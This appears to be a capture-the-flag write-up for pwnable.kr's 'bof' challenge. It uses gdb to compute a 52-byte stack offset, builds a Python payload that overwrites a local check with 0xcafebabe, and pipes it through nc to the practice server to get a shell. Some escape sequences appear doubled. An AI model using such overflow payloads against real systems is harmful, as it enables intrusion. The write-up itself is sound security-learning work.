after analysing bof with gdb, mainly the 'disass' tool we can assume that the
key we want to change is located on `ebp+0x8`  

based on   
`cmp    DWORD PTR [ebp+0x8],0xcafebabe`
(we are comparing the value at ebp+0x8 with 0xcafebabe)

then, based on the continuation of 
```
    0x00000644 <+24>:    call   0x645 <func+25>
    0x00000649 <+29>:    lea    eax,[ebp-0x2c]
    0x0000064c <+32>:    mov    DWORD PTR [esp],eax
```
we can safely assume that `overflowme` is on `ebp-0x2c`

from `(gdb) x/1s $ebp-0x2c`
we know that the address is `0xffffcc4c`

and from `(gdb) x $ebp+8`
we know that the address is `0xffffcc80`

difference between these 2 addresses is 52
`0xffffcc4c - 0xffffcc80 = -52`

so we need a buffer overflow exploit

In [ ]:
# 52 bytes of padding + bytes we want to overwrite
print ('a'*52+'\xbe\xba\xfe\xca')

# but this will not work :D because python3 print function encodes the bytes to string
# so we want a way to print the bytes as they are

import sys

sys.stdout.buffer.write(b'\\x01'*52+b'\\xbe\\xba\\xfe\\xca' + b'\\n')

# this will print the bytes as they are


but we need to to print it, use 'nc' to connect to pwnable server and also use cat for flag
```bash
(python3 -c "import sys; sys.stdout.buffer.write(b'\\x01'*52+b'\\xbe\\xba\\xfe\\xca' + b'\\n')";cat) | nc pwnable.kr 9000 
```

then just run `cat flag`